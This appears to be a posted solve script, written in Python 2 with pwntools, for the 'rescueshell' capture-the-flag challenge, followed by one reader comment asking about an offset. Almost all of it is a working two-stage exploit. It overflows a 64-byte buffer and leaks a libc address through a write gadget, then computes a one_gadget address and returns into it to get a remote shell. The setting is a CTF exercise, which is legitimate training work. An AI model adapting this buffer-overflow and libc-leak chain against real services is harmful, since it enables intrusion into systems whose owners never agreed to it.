@CreateRemoteThread
Created March 31, 2018 22:57
```python
#!/usr/bin/python
# Python 2 script (str-based payloads, print statement, raw_input);
# solve script for the "rescueshell" challenge, built on pwntools.
import pwn
import struct

p = pwn.remote("rescueshell.challs.malice.fr", 6060)
# p = pwn.process("./rescue")   # local run instead of the remote instance
raw_input("ATTACH NOW")          # pause so a debugger can be attached first

# stage 1: overflow the buffer, then return through the write gadget
# with a GOT entry as the argument to leak a libc address
payload = "a" * 64
payload += pwn.p64(0x601210 + 320)  # PRINTF
payload += pwn.p64(0x40099a)        # WRITE GADGET
p.recv()
p.sendline(payload)
data = p.recv(timeout=2)

# i think it eats zeros. lets grab 0x7f as the start.
print "DATA IS: " + data.encode("hex")
data = data[0:6] + "\x00\x00"       # pad the 6 leaked bytes to a full 64-bit value
strncmp_leak = struct.unpack("<Q", data[0:8])
print hex(strncmp_leak[0])

# fread
# rebase from the leaked symbol to the one_gadget offset in this libc build
one_gadget = strncmp_leak[0] - 0x6A460 + 0x41320
print "one_gadget leak at %x" % one_gadget

# stage 2: same overflow, returning into the computed one_gadget address
payload = "a" * 64
payload += pwn.p64(0x601208 + 320)  # PRINTF
payload += pwn.p64(one_gadget)
p.sendline(payload)
p.interactive()
```
@hacker1984

May I know which offset is 0x41320?
